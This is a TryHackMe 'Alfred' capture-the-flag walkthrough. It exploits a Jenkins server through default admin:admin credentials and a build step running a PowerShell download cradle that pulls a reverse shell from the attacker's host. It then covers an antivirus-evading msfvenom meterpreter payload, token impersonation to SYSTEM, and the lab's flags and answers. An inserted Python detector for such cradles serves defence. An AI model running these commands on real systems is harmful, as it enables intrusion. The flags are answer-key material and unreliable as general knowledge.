TryHackMe: Alfred
Exploiting Jenkins and Windows Token

Initial Enumeration
┌──(root💀kali)-[/home/kali/Tryhackme/OSCPprep/Alfred]
└─# nmap -sV -PS -sC -iL ip.txt | tee nmap1.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-05 03:09 EST
Nmap scan report for 10.10.180.87
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2022-03-04T07:58:29
|_Not valid after: 2022-09-03T07:58:29
|_ssl-date: 2022-03-05T08:10:26+00:00; +2s from scanner time.
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.25 seconds
Accessing port 80

Accessing port 8080

Initial Access


Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use the following command to get a reverse shell back to your machine; host the script, then run it:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Create a Project



Paste the PowerShell command below:
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.58.66:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.58.66 -Port 1234

Then click ‘Apply’ and ‘Save’.
Set up a Python simple HTTP server and a netcat listener.


Back on the Jenkins dashboard, build the project you made earlier.


Check your Python HTTP server.

Check your netcat listener.

Command Breakdown
Source of Invoke-PowerShellTcp.ps1:
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Download the Invoke-PowerShellTcp.ps1 script from the attacker’s machine and run it in memory with iex (Invoke-Expression):
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.58.66:8000/Invoke-PowerShellTcp.ps1')

That’s why we set up the Python simple HTTP server earlier.

Connect back to the attacker’s machine through the reverse shell:
Invoke-PowerShellTcp -Reverse -IPAddress 10.11.58.66 -Port 1234
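A defender’s view of the same cradle, as an added example that is not part of the original writeup: a small Python check that scans process-creation records (the parent image, image, command line and working directory that Sysmon Event ID 1 or Windows event 4688 carry) for PowerShell WebClient downloads and in-memory execution, and raises the severity when the process was spawned under the Jenkins install tree. The records, the Jenkins java.exe parent path and the severity scale are constructed assumptions.

```python
import re

# Constructed process-creation records in the shape Sysmon Event ID 1 / Windows 4688 provide
# (parent image, image, command line, working directory). Test data, not captured logs.
SAMPLE_EVENTS = [
    {   # the build step from the writeup; the Jenkins java.exe parent path is an assumption
        "parent": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell iex (New-Object Net.WebClient).DownloadString("
                   "'http://10.11.58.66:8000/Invoke-PowerShellTcp.ps1');"
                   "Invoke-PowerShellTcp -Reverse -IPAddress 10.11.58.66 -Port 1234",
        "cwd": r"C:\Program Files (x86)\Jenkins\workspace\test",
    },
    {   # the later payload transfer: a WebClient download to disk from the same workspace
        "parent": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell \"(New-Object System.Net.WebClient).Downloadfile("
                   "'http://10.11.58.66:8000/sumi.exe','sumi.exe')\"",
        "cwd": r"C:\Program Files (x86)\Jenkins\workspace\test",
    },
    {   # benign: an interactive PowerShell started from Explorer, listing a folder
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell Get-ChildItem C:\Users\bruce\Desktop",
        "cwd": r"C:\Users\bruce",
    },
]

WEBCLIENT = re.compile(r"(?i)net\.webclient|downloadstring|downloadfile")
IN_MEMORY = re.compile(r"(?i)\biex\b|invoke-expression")  # executes without touching disk
JENKINS = re.compile(r"(?i)\\jenkins\\")                   # anywhere under the Jenkins tree

def classify(event):
    """Return a finding dict for a suspicious PowerShell download, or None if benign."""
    cmd = event["cmdline"]
    if not event["image"].lower().endswith("powershell.exe") or not WEBCLIENT.search(cmd):
        return None
    if IN_MEMORY.search(cmd):
        finding, severity = "in-memory download cradle", "high"
    else:
        finding, severity = "WebClient file download", "medium"
    from_jenkins = bool(JENKINS.search(event["cwd"]) or JENKINS.search(event["parent"]))
    if from_jenkins:  # a CI job runner has no business pulling scripts from arbitrary hosts
        severity = {"high": "critical", "medium": "high"}[severity]
    return {"finding": finding, "severity": severity, "from_jenkins": from_jenkins, "cmdline": cmd}

def scan(events):
    """Run classify() over every record and keep only the findings."""
    return [f for f in map(classify, events) if f]
```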

Get the user flag once the reverse shell is successful.
PS C:\Users\bruce\Desktop> ls

    Directory: C:\Users\bruce\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        10/25/2019  11:22 PM         32 user.txt

PS C:\Users\bruce\Desktop> cat user.txt
79007a09481963edf2e1321abd9ae2a0
Transfer shell to meterpreter
To make the privilege escalation easier, let’s switch to a meterpreter shell using the following process.
Use msfvenom to create a windows meterpreter reverse shell using the following payload — THM
Generate payload format:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.58.66 LPORT=5555 -f exe -o sumi.exe

This payload generates an encoded x86–64 reverse tcp meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly, and also to evade anti-virus products. An anti-virus product may not recognise the payload and won’t flag it as malicious. — THM
Now that the exe payload exists, set up a msfconsole listener (multi/handler) to catch the meterpreter session.
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.11.58.66
msf6 exploit(multi/handler) > set LPORT 5555
msf6 exploit(multi/handler) > run
Now our listener is up and running. Let’s transfer our executable payload to the target machine.
Command format:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.58.66:8000/sumi.exe','sumi.exe')"


Now that the exe payload is on the target machine, it’s time to execute it.
Start-Process "sumi.exe"

Back to our meterpreter shell.

View all the privileges using whoami /priv:
meterpreter > shell
Process 2484 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Jenkins\workspace\test>whoami /priv

You can see that two privileges (SeDebugPrivilege and SeImpersonatePrivilege) are enabled. Let’s use the incognito module, which lets us take advantage of SeImpersonatePrivilege by impersonating available tokens.
Enter load incognito to load the incognito module in Metasploit.
Please note, you may need to use the use incognito command if the previous command doesn’t work. Also ensure that your metasploit is up to date.
— THM
So, what’s next?
- Back to meterpreter shell.
- Load incognito in meterpreter.
- List tokens to impersonate.
- Generate token.
# 1 Back to meterpreter shell
C:\Program Files (x86)\Jenkins\workspace\test>exit
# 2 Load incognito in meterpreter
meterpreter >
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter >
# 3 List tokens to impersonate
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
# 4 Generate token
We can see that the BUILTIN\Administrators token is available.
Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token.
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >
Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions. The safest process to pick is the services.exe process.
First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
— THM
meterpreter > ps

Process List
============

 PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 668  580   services.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe

meterpreter > migrate 668
[*] Migrating from 964 to 668...
[*] Migration completed successfully.
meterpreter >
Find the root flag
meterpreter > search -f root.txt
Found 1 result...
c:\Windows\System32\config\root.txt (70 bytes)
meterpreter >
meterpreter > cat "c:\Windows\System32\config\root.txt"
dff0f748678f280250f25a45b8046b4a
meterpreter >
Initial Access
How many ports are open? (TCP only)
Answer: 3
What is the username and password for the login panel (in the format username:password)?
Answer: admin:admin
What is the user.txt flag?
Answer: 79007a09481963edf2e1321abd9ae2a0
Switching Shells
What is the final size of the exe payload that you generated?
Answer: 73802
Privilege Escalation
What is the output when you run the getuid command?
Answer: NT AUTHORITY\SYSTEM
Read the root.txt file at C:\Windows\System32\config
Answer: dff0f748678f280250f25a45b8046b4a